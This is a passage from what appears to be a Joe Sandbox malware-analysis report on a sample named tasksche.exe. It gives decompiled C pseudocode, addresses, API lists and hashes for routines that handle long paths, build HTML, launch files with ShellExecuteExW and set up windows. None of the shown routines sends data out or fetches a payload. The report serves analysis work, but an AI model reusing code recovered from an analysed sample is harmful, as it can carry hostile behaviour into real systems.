                                                                                              			}








                                                                                              0x00405613
                                                                                              0x00405616
                                                                                              0x0040561a
                                                                                              0x0040561e
                                                                                              0x00405632
                                                                                              0x00405639
                                                                                              0x0040563a
                                                                                              0x0040563a
                                                                                              0x00405640
                                                                                              0x0040564b
                                                                                              0x0040564f
                                                                                              0x0040564f
                                                                                              0x00405652
                                                                                              0x004056bc
                                                                                              0x004056bf
                                                                                              0x004056c2
                                                                                              0x004056c2
                                                                                              0x004056c5
                                                                                              0x004056c5
                                                                                              0x00000000
                                                                                              0x004056e0
                                                                                              0x004056d7
                                                                                              0x004056de
                                                                                              0x004056df
                                                                                              0x004056df
                                                                                              0x004056e7
                                                                                              0x004056e7
                                                                                              0x00000000

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 866ee34adc6fec30ee19582cd252525266032b464ccb2f20f1e66a817629a287
                                                                                              • Instruction ID: 2ccb413243c8e3f3810094ea986113c02d7a387cc67c693c5ca68079d889c8bb
                                                                                              • Opcode Fuzzy Hash: 866ee34adc6fec30ee19582cd252525266032b464ccb2f20f1e66a817629a287
                                                                                              • Instruction Fuzzy Hash: 2821D872A106716BD7048F65EC8412733A2D7CA3617DB4237DF445B3B1D135B922CAE8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040A3DC(signed short* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                              				short _v4100;
                                                                                              				signed short* _t26;
                                                                                              				long _t28;
                                                                                              				signed short* _t29;
                                                                                              				void* _t35;
                                                                                              				signed short* _t49;
                                                                                              				void* _t58;
                                                                                              				signed short* _t75;
                                                                                              				signed short* _t76;
                                                                                              
                                                                                              				E0041AAF0(0x1000);
                                                                                              				_t75 = _a4;
                                                                                              				if( *_t75 != 0) {
                                                                                              					E0040A0EA(_t75);
                                                                                              					_t58 = E0041A7AF(_t75);
                                                                                              					_t26 = E0040A2F5(_t75);
                                                                                              					__eflags = _t26;
                                                                                              					if(_t26 == 0) {
                                                                                              						_t28 = GetCurrentDirectoryW(0x7ff,  &_v4100);
                                                                                              						__eflags = _t28;
                                                                                              						if(_t28 == 0) {
                                                                                              							L21:
                                                                                              							_t29 = 0;
                                                                                              							__eflags = 0;
                                                                                              							L22:
                                                                                              							return _t29;
                                                                                              						}
                                                                                              						__eflags = _t28 - 0x7ff;
                                                                                              						if(_t28 > 0x7ff) {
                                                                                              							goto L21;
                                                                                              						}
                                                                                              						__eflags = E0040A0C5( *_t75 & 0x0000ffff);
                                                                                              						if(__eflags == 0) {
                                                                                              							E0040A116(__eflags,  &_v4100, 0x800);
                                                                                              							_t35 = E0041A7AF( &_v4100);
                                                                                              							__eflags = _a12 - _t35 + _t58 + 4;
                                                                                              							if(_a12 <= _t35 + _t58 + 4) {
                                                                                              								goto L21;
                                                                                              							}
                                                                                              							_t68 = _a8;
                                                                                              							E0041C853(_a8, L"\\\\?\\", 4);
                                                                                              							E0041A7F7(_t68 + 8,  &_v4100);
                                                                                              							__eflags =  *_t75 - 0x2e;
                                                                                              							if(__eflags == 0) {
                                                                                              								__eflags = E0040A0C5(_t75[1] & 0x0000ffff);
                                                                                              								if(__eflags != 0) {
                                                                                              									__eflags = _t75;
                                                                                              								}
                                                                                              							}
                                                                                              							E00410BC9(__eflags, _t68, _t75, _a12);
                                                                                              							L20:
                                                                                              							_t29 = 1;
                                                                                              							goto L22;
                                                                                              						}
                                                                                              						__eflags = _a12 - _t58 + 6;
                                                                                              						if(_a12 <= _t58 + 6) {
                                                                                              							goto L21;
                                                                                              						}
                                                                                              						_t69 = _a8;
                                                                                              						E0041C853(_a8, L"\\\\?\\", 4);
                                                                                              						E0041C853(_t69 + 8,  &_v4100, 2);
                                                                                              						E0041A7F7(_t69 + 0xc, _t75);
                                                                                              						goto L20;
                                                                                              					}
                                                                                              					_t49 = E0040A0EA(_t75);
                                                                                              					__eflags = _t49;
                                                                                              					if(_t49 == 0) {
                                                                                              						__eflags =  *_t75 - 0x5c;
                                                                                              						if( *_t75 != 0x5c) {
                                                                                              							goto L21;
                                                                                              						}
                                                                                              						_t76 =  &(_t75[1]);
                                                                                              						__eflags =  *_t76 - 0x5c;
                                                                                              						if( *_t76 != 0x5c) {
                                                                                              							goto L21;
                                                                                              						}
                                                                                              						__eflags = _a12 - _t58 + 6;
                                                                                              						if(_a12 <= _t58 + 6) {
                                                                                              							goto L21;
                                                                                              						}
                                                                                              						_t71 = _a8;
                                                                                              						E0041C853(_a8, L"\\\\?\\", 4);
                                                                                              						E0041A7F7(_t71 + 8, L"UNC");
                                                                                              						E0041A7F7(_t71 + 0xe, _t76);
                                                                                              						goto L20;
                                                                                              					}
                                                                                              					__eflags = _a12 - _t58 + 4;
                                                                                              					if(_a12 <= _t58 + 4) {
                                                                                              						goto L21;
                                                                                              					}
                                                                                              					_t73 = _a8;
                                                                                              					E0041C853(_a8, L"\\\\?\\", 4);
                                                                                              					E0041A7F7(_t73 + 8, _t75);
                                                                                              					goto L20;
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}












                                                                                              0x0040a3e4
                                                                                              0x0040a3ea
                                                                                              0x0040a3f1
                                                                                              0x0040a3fd
                                                                                              0x0040a40a
                                                                                              0x0040a40c
                                                                                              0x0040a411
                                                                                              0x0040a413
                                                                                              0x0040a4b1
                                                                                              0x0040a4b7
                                                                                              0x0040a4b9
                                                                                              0x0040a580
                                                                                              0x0040a580
                                                                                              0x0040a580
                                                                                              0x0040a582
                                                                                              0x00000000
                                                                                              0x0040a583
                                                                                              0x0040a4bf
                                                                                              0x0040a4c1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a4d0
                                                                                              0x0040a4d2
                                                                                              0x0040a51d
                                                                                              0x0040a529
                                                                                              0x0040a533
                                                                                              0x0040a536
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a538
                                                                                              0x0040a543
                                                                                              0x0040a553
                                                                                              0x0040a55b
                                                                                              0x0040a55f
                                                                                              0x0040a56b
                                                                                              0x0040a56d
                                                                                              0x0040a56f
                                                                                              0x0040a56f
                                                                                              0x0040a56d
                                                                                              0x0040a577
                                                                                              0x0040a57c
                                                                                              0x0040a57c
                                                                                              0x00000000
                                                                                              0x0040a57c
                                                                                              0x0040a4d7
                                                                                              0x0040a4da
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a4e0
                                                                                              0x0040a4eb
                                                                                              0x0040a4fd
                                                                                              0x0040a507
                                                                                              0x00000000
                                                                                              0x0040a50c
                                                                                              0x0040a41a
                                                                                              0x0040a41f
                                                                                              0x0040a421
                                                                                              0x0040a451
                                                                                              0x0040a455
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a45b
                                                                                              0x0040a45e
                                                                                              0x0040a462
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a46b
                                                                                              0x0040a46e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a474
                                                                                              0x0040a47f
                                                                                              0x0040a48d
                                                                                              0x0040a497
                                                                                              0x00000000
                                                                                              0x0040a49c
                                                                                              0x0040a426
                                                                                              0x0040a429
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040a42f
                                                                                              0x0040a43a
                                                                                              0x0040a444
                                                                                              0x00000000
                                                                                              0x0040a449
                                                                                              0x00000000

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscpy_wcslen_wcsncpy
                                                                                              • String ID: UNC$\\?\
                                                                                              • API String ID: 677062453-253988292
                                                                                              • Opcode ID: 2abde0defb8e8217f0e08e38dadbd9202aa69e0edf90a9fc0407522747aefdaa
                                                                                              • Instruction ID: cd13f9bd72fca169d524aa050727d65a10ef4dcd9f377a8cbe6755f4863ba3db
                                                                                              • Opcode Fuzzy Hash: 2abde0defb8e8217f0e08e38dadbd9202aa69e0edf90a9fc0407522747aefdaa
                                                                                              • Instruction Fuzzy Hash: 7441AF7294131476DB20AA618C82AEB33687F55748F04442FF954732C2E7BCD6A586AB
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 86%
                                                                                              			E00419779(void* __ebx, intOrPtr __ecx, short* _a4, char _a7) {
                                                                                              				short* _v8;
                                                                                              				signed int _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* __ebp;
                                                                                              				void* _t26;
                                                                                              				short* _t30;
                                                                                              				signed int _t34;
                                                                                              				signed int _t41;
                                                                                              				int _t42;
                                                                                              				void* _t50;
                                                                                              				char* _t51;
                                                                                              				void* _t66;
                                                                                              				void* _t67;
                                                                                              				short* _t68;
                                                                                              				short* _t71;
                                                                                              				int _t75;
                                                                                              
                                                                                              				_v16 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx + 0x10)) == 0) {
                                                                                              					return _t26;
                                                                                              				}
                                                                                              				_v12 = _v12 & 0x00000000;
                                                                                              				_t71 = _a4;
                                                                                              				_push(_t67);
                                                                                              				_a7 = E004191A2(_t71);
                                                                                              				_t30 = E0041CF3E(__ebx, _t66, _t67, E0041A7AF(_t71) + _t28 + 0x200);
                                                                                              				_t68 = _t30;
                                                                                              				if(_t68 == 0) {
                                                                                              					L16:
                                                                                              					return _t30;
                                                                                              				}
                                                                                              				_push(__ebx);
                                                                                              				_t47 = L"<html>";
                                                                                              				E0041A7F7(_t68, L"<html>");
                                                                                              				E0041A7C9(_t68, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
                                                                                              				E0041A7C9(_t68, L"utf-8\"></head>");
                                                                                              				_v8 = _t71;
                                                                                              				if( *_t71 != 0x20) {
                                                                                              					L4:
                                                                                              					_t34 = E00411E81(_t82, _v8, _t47, 6);
                                                                                              					asm("sbb bl, bl");
                                                                                              					_t50 =  ~_t34 + 1;
                                                                                              					if(_t50 != 0) {
                                                                                              						_t71 = _v8 + 0xc;
                                                                                              					}
                                                                                              					E0041A7C9(_t68, _t71);
                                                                                              					if(_t50 == 0) {
                                                                                              						E0041A7C9(_t68, L"</html>");
                                                                                              					}
                                                                                              					_t86 = _a7;
                                                                                              					if(_a7 == 0) {
                                                                                              						_t68 = E004191D8(_t50, _t86, _t68);
                                                                                              					}
                                                                                              					_t75 = 9 + E0041A7AF(_t68) * 6;
                                                                                              					_t51 = GlobalAlloc(0x40, _t75);
                                                                                              					if(_t51 != 0) {
                                                                                              						_t75 = _t75 + 0xfffffffd;
                                                                                              						_t17 = _t51 + 3; // 0x3
                                                                                              						_t42 = WideCharToMultiByte(0xfde9, 0, _t68, 0xffffffff, _t17, _t75, 0, 0);
                                                                                              						_t88 = _t42;
                                                                                              						if(_t42 == 0) {
                                                                                              							 *_t51 = 0;
                                                                                              						} else {
                                                                                              							 *_t51 = 0xef;
                                                                                              							 *((char*)(_t51 + 1)) = 0xbb;
                                                                                              							 *((char*)(_t51 + 2)) = 0xbf;
                                                                                              						}
                                                                                              					}
                                                                                              					E0041A506(_t51, _t68, _t75, _t88);
                                                                                              					_t30 =  &_v12;
                                                                                              					__imp__CreateStreamOnHGlobal(_t51, 1, _t30, _t68);
                                                                                              					if(_t30 >= 0) {
                                                                                              						E0041963B(_v16,  *((intOrPtr*)(_v16 + 0x10)), _v12);
                                                                                              						_t41 = _v12;
                                                                                              						_t30 =  *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                              					}
                                                                                              					goto L16;
                                                                                              				} else {
                                                                                              					goto L3;
                                                                                              				}
                                                                                              				do {
                                                                                              					L3:
                                                                                              					_v8 = _v8 + 2;
                                                                                              					_t82 =  *_v8 - 0x20;
                                                                                              				} while ( *_v8 == 0x20);
                                                                                              				goto L4;
                                                                                              			}





















                                                                                              0x00419783
                                                                                              0x00419786
                                                                                              0x004198bf
                                                                                              0x004198bf
                                                                                              0x0041978c
                                                                                              0x00419791
                                                                                              0x00419794
                                                                                              0x0041979c
                                                                                              0x004197ac
                                                                                              0x004197b1
                                                                                              0x004197b7
                                                                                              0x004198bc
                                                                                              0x00000000
                                                                                              0x004198bd
                                                                                              0x004197bd
                                                                                              0x004197be
                                                                                              0x004197c5
                                                                                              0x004197d0
                                                                                              0x004197db
                                                                                              0x004197e7
                                                                                              0x004197ea
                                                                                              0x004197f9
                                                                                              0x004197ff
                                                                                              0x00419808
                                                                                              0x0041980a
                                                                                              0x0041980c
                                                                                              0x00419811
                                                                                              0x00419811
                                                                                              0x00419816
                                                                                              0x0041981f
                                                                                              0x00419827
                                                                                              0x0041982d
                                                                                              0x0041982e
                                                                                              0x00419832
                                                                                              0x0041983d
                                                                                              0x0041983d
                                                                                              0x0041984b
                                                                                              0x00419857
                                                                                              0x0041985d
                                                                                              0x00419861
                                                                                              0x00419865
                                                                                              0x00419872
                                                                                              0x00419878
                                                                                              0x0041987a
                                                                                              0x00419889
                                                                                              0x0041987c
                                                                                              0x0041987c
                                                                                              0x0041987f
                                                                                              0x00419883
                                                                                              0x00419883
                                                                                              0x0041987a
                                                                                              0x0041988d
                                                                                              0x00419893
                                                                                              0x0041989a
                                                                                              0x004198a3
                                                                                              0x004198ae
                                                                                              0x004198b3
                                                                                              0x004198b9
                                                                                              0x004198b9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004197ec
                                                                                              0x004197ec
                                                                                              0x004197ec
                                                                                              0x004197f3
                                                                                              0x004197f3
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • _wcslen.LIBCMT ref: 0041979F
                                                                                              • _malloc.LIBCMT ref: 004197AC
                                                                                                • Part of subcall function 0041CF3E: __FF_MSGBANNER.LIBCMT ref: 0041CF61
                                                                                                • Part of subcall function 0041CF3E: __NMSG_WRITE.LIBCMT ref: 0041CF68
                                                                                                • Part of subcall function 0041CF3E: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,004212F4,00000000,00000001,00000000,?,0041EF2D,00000018,0042D930,0000000C,0041EFBE), ref: 0041CFB5
                                                                                              • _wcscpy.LIBCMT ref: 004197C5
                                                                                              • _wcscat.LIBCMT ref: 004197D0
                                                                                              • _wcscat.LIBCMT ref: 004197DB
                                                                                              • _wcscat.LIBCMT ref: 00419816
                                                                                              • _wcscat.LIBCMT ref: 00419827
                                                                                              • _wcslen.LIBCMT ref: 00419840
                                                                                              • GlobalAlloc.KERNEL32(00000040,-00000009,?,<html>,00000006), ref: 00419851
                                                                                              • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,-00000106,00000000,00000000), ref: 00419872
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,00000000), ref: 0041989A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscat$Global_wcslen$AllocAllocateByteCharCreateHeapMultiStreamWide_malloc_wcscpy
                                                                                              • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                              • API String ID: 4158105118-4209811716
                                                                                              • Opcode ID: 53bc3352f8ea50f6b55b98aeccbf3bf7f091601a8e366390c7fd0f244fec85a0
                                                                                              • Instruction ID: 9750a07ada00fadd6417d4a808c8c0194c88b3581ecb1a923ba5d07fa5d26e01
                                                                                              • Opcode Fuzzy Hash: 53bc3352f8ea50f6b55b98aeccbf3bf7f091601a8e366390c7fd0f244fec85a0
                                                                                              • Instruction Fuzzy Hash: 1C312A32900205BBDB11BB659C95EEF77789F42724F14415FF810AB2C6DB7C8E81836A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040E46C(signed short* __ecx, struct HWND__* _a4, intOrPtr _a8) {
                                                                                              				char _v5;
                                                                                              				intOrPtr _v12;
                                                                                              				long _v16;
                                                                                              				struct _SHELLEXECUTEINFOW _v76;
                                                                                              				char _v4172;
                                                                                              				void* __edi;
                                                                                              				void* _t58;
                                                                                              				signed int _t61;
                                                                                              				intOrPtr* _t62;
                                                                                              				intOrPtr _t63;
                                                                                              				int _t66;
                                                                                              				intOrPtr _t76;
                                                                                              				signed short* _t83;
                                                                                              				signed int _t89;
                                                                                              				signed short* _t90;
                                                                                              				signed short _t92;
                                                                                              				long _t94;
                                                                                              				signed short* _t97;
                                                                                              
                                                                                              				_t58 = E0041AAF0(0x1048);
                                                                                              				_t97 = __ecx;
                                                                                              				if( *((intOrPtr*)(__ecx)) == 0) {
                                                                                              					L51:
                                                                                              					return _t58;
                                                                                              				}
                                                                                              				_t58 = E0041A7AF(__ecx);
                                                                                              				if(_t58 >= 0x7f6) {
                                                                                              					goto L51;
                                                                                              				} else {
                                                                                              					_t94 = 0x3c;
                                                                                              					E0041A820(_t94,  &_v76, 0, _t94);
                                                                                              					_t89 =  *_t97 & 0x0000ffff;
                                                                                              					_v76.cbSize = _t94;
                                                                                              					_v76.fMask = 0x1c0;
                                                                                              					if(_t89 != 0x22) {
                                                                                              						_v76.lpFile = _t97;
                                                                                              					} else {
                                                                                              						_v76.lpFile =  &(_t97[1]);
                                                                                              					}
                                                                                              					_t61 = 0;
                                                                                              					if(_t89 == 0) {
                                                                                              						L20:
                                                                                              						_t62 = _v76.lpParameters;
                                                                                              						if(_t62 == 0 ||  *_t62 == 0) {
                                                                                              							if(_a8 == 0 &&  *0x44287a != 0) {
                                                                                              								_v76.lpParameters = 0x44287a;
                                                                                              							}
                                                                                              						}
                                                                                              						_v76.nShow = 1;
                                                                                              						_t63 = E0040A76A(_v76.lpFile);
                                                                                              						_v12 = _t63;
                                                                                              						if(_t63 != 0 && E00411E60(_t63, L".inf") == 0) {
                                                                                              							_v76.lpVerb = L"Install";
                                                                                              						}
                                                                                              						if(E004092A5(_v76.lpFile) != 0) {
                                                                                              							E0040A9CB(_t94, _v76.lpFile,  &_v4172, 0x800);
                                                                                              							_v76.lpFile =  &_v4172;
                                                                                              						}
                                                                                              						_t66 = ShellExecuteExW( &_v76);
                                                                                              						if(_t66 == 0) {
                                                                                              							L50:
                                                                                              							return _t66;
                                                                                              						} else {
                                                                                              							_v5 = 0;
                                                                                              							if( *0x441870 != 0 || _a8 != 0 ||  *0x44185d != 0) {
                                                                                              								if(_a4 != 0 && IsWindowVisible(_a4) != 0) {
                                                                                              									ShowWindow(_a4, 0);
                                                                                              									_v5 = 1;
                                                                                              								}
                                                                                              								WaitForInputIdle(_v76.hProcess, 0x7d0);
                                                                                              								E0040D857(_v76.hProcess);
                                                                                              								if( *0x44185d != 0 && GetExitCodeProcess(_v76.hProcess,  &_v16) != 0) {
                                                                                              									_t76 = _v16 + 0x3e8;
                                                                                              									if(_t76 >  *0x441860) {
                                                                                              										 *0x441860 = _t76;
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              							_t66 = CloseHandle(_v76.hProcess);
                                                                                              							if(_v12 == 0) {
                                                                                              								L43:
                                                                                              								if( *0x441870 == 0 || _a8 != 0) {
                                                                                              									_t66 = ((0 | _a8 == 0x00000000) - 0x00000001 & 0xfffffce0) + 0x3e8;
                                                                                              									 *0x441864 = _t66;
                                                                                              								} else {
                                                                                              									 *0x441864 = 0x1b58;
                                                                                              								}
                                                                                              								goto L47;
                                                                                              							} else {
                                                                                              								_t66 = E00411E60(_v12, L".exe");
                                                                                              								if(_t66 == 0) {
                                                                                              									L47:
                                                                                              									if(_v5 != 0 && _a8 != 0) {
                                                                                              										_t66 = ShowWindow(_a4, 1);
                                                                                              									}
                                                                                              									goto L50;
                                                                                              								}
                                                                                              								goto L43;
                                                                                              							}
                                                                                              						}
                                                                                              					} else {
                                                                                              						_t90 = _t97;
                                                                                              						do {
                                                                                              							if( *_t90 != 0x22) {
                                                                                              								L13:
                                                                                              								if(_t97[_t61] == 0x20 ||  *((short*)(_t97 + 2 + _t61 * 2)) == 0x2f) {
                                                                                              									_t83 =  &(_t97[_t61]);
                                                                                              									if( *_t83 == 0x20) {
                                                                                              										 *_t83 = 0;
                                                                                              									}
                                                                                              									_v76.lpParameters =  &(_t83[1]);
                                                                                              									goto L20;
                                                                                              								} else {
                                                                                              									goto L15;
                                                                                              								}
                                                                                              							}
                                                                                              							while(1) {
                                                                                              								_t61 = _t61 + 1;
                                                                                              								if(_t97[_t61] == 0) {
                                                                                              									break;
                                                                                              								}
                                                                                              								if(_t97[_t61] == 0x22) {
                                                                                              									_t92 = 0x20;
                                                                                              									_t97[_t61] = _t92;
                                                                                              									goto L13;
                                                                                              								}
                                                                                              							}
                                                                                              							goto L13;
                                                                                              							L15:
                                                                                              							_t61 = _t61 + 1;
                                                                                              							_t90 =  &(_t97[_t61]);
                                                                                              						} while ( *_t90 != 0);
                                                                                              						goto L20;
                                                                                              					}
                                                                                              				}
                                                                                              			}





















                                                                                              0x0040e474
                                                                                              0x0040e47b
                                                                                              0x0040e482
                                                                                              0x0040e68a
                                                                                              0x0040e68a
                                                                                              0x0040e68a
                                                                                              0x0040e489
                                                                                              0x0040e494
                                                                                              0x00000000
                                                                                              0x0040e49a
                                                                                              0x0040e49d
                                                                                              0x0040e4a4
                                                                                              0x0040e4a9
                                                                                              0x0040e4af
                                                                                              0x0040e4b2
                                                                                              0x0040e4bd
                                                                                              0x0040e4c7
                                                                                              0x0040e4bf
                                                                                              0x0040e4c2
                                                                                              0x0040e4c2
                                                                                              0x0040e4ca
                                                                                              0x0040e4cf
                                                                                              0x0040e520
                                                                                              0x0040e520
                                                                                              0x0040e525
                                                                                              0x0040e52f
                                                                                              0x0040e53a
                                                                                              0x0040e53a
                                                                                              0x0040e52f
                                                                                              0x0040e544
                                                                                              0x0040e54b
                                                                                              0x0040e550
                                                                                              0x0040e555
                                                                                              0x0040e566
                                                                                              0x0040e566
                                                                                              0x0040e577
                                                                                              0x0040e588
                                                                                              0x0040e593
                                                                                              0x0040e593
                                                                                              0x0040e59a
                                                                                              0x0040e5a2
                                                                                              0x0040e686
                                                                                              0x00000000
                                                                                              0x0040e5a8
                                                                                              0x0040e5ae
                                                                                              0x0040e5bc
                                                                                              0x0040e5ce
                                                                                              0x0040e5e1
                                                                                              0x0040e5e3
                                                                                              0x0040e5e3
                                                                                              0x0040e5ef
                                                                                              0x0040e5f8
                                                                                              0x0040e603
                                                                                              0x0040e619
                                                                                              0x0040e621
                                                                                              0x0040e623
                                                                                              0x0040e623
                                                                                              0x0040e621
                                                                                              0x0040e603
                                                                                              0x0040e62b
                                                                                              0x0040e634
                                                                                              0x0040e647
                                                                                              0x0040e64d
                                                                                              0x0040e66e
                                                                                              0x0040e670
                                                                                              0x0040e654
                                                                                              0x0040e654
                                                                                              0x0040e654
                                                                                              0x00000000
                                                                                              0x0040e636
                                                                                              0x0040e63e
                                                                                              0x0040e645
                                                                                              0x0040e675
                                                                                              0x0040e678
                                                                                              0x0040e684
                                                                                              0x0040e684
                                                                                              0x00000000
                                                                                              0x0040e678
                                                                                              0x00000000
                                                                                              0x0040e645
                                                                                              0x0040e634
                                                                                              0x0040e4d1
                                                                                              0x0040e4d1
                                                                                              0x0040e4d3
                                                                                              0x0040e4d7
                                                                                              0x0040e4f2
                                                                                              0x0040e4f7
                                                                                              0x0040e50c
                                                                                              0x0040e513
                                                                                              0x0040e517
                                                                                              0x0040e517
                                                                                              0x0040e51d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e4f7
                                                                                              0x0040e4e2
                                                                                              0x0040e4e2
                                                                                              0x0040e4e7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040e4e0
                                                                                              0x0040e4ed
                                                                                              0x0040e4ee
                                                                                              0x00000000
                                                                                              0x0040e4ee
                                                                                              0x0040e4e0
                                                                                              0x00000000
                                                                                              0x0040e501
                                                                                              0x0040e501
                                                                                              0x0040e502
                                                                                              0x0040e505
                                                                                              0x00000000
                                                                                              0x0040e50a
                                                                                              0x0040e4cf

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_memset_wcslen
                                                                                              • String ID: .exe$.inf$z(D
                                                                                              • API String ID: 3215649069-3601587883
                                                                                              • Opcode ID: bed88ef6189cab0bc2363a68129e730fc28d238946ac4723ee352b551c7a999f
                                                                                              • Instruction ID: 3e26098100528e53db86749210a7047ac1cc05a8490cbdb1dbf577081e62715c
                                                                                              • Opcode Fuzzy Hash: bed88ef6189cab0bc2363a68129e730fc28d238946ac4723ee352b551c7a999f
                                                                                              • Instruction Fuzzy Hash: 8051B571910258BADF31AFA2EC405AE7BB4EF11304F444C7BE841B72E1E77999A5CB09
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 87%
                                                                                              			E00419A9D(void* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, struct HWND__* _a12, intOrPtr _a16, int _a20) {
                                                                                              				intOrPtr _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				struct tagPOINT _v20;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				void* __ebp;
                                                                                              				struct HWND__* _t41;
                                                                                              				long _t42;
                                                                                              				struct HWND__* _t46;
                                                                                              				void* _t52;
                                                                                              				struct HWND__* _t61;
                                                                                              				void* _t69;
                                                                                              				WCHAR* _t71;
                                                                                              
                                                                                              				_t61 = _a8;
                                                                                              				_t69 = __ecx;
                                                                                              				 *(__ecx + 8) = _t61;
                                                                                              				 *((char*)(__ecx + 0x25)) = _a20;
                                                                                              				ShowWindow(_t61, 0);
                                                                                              				E00419A36(_t69, _a4);
                                                                                              				 *(_t69 + 0x14) = _a12;
                                                                                              				 *((intOrPtr*)(_t69 + 0x18)) = _a16;
                                                                                              				GetWindowRect(_t61,  &_v20);
                                                                                              				_t52 = GetParent;
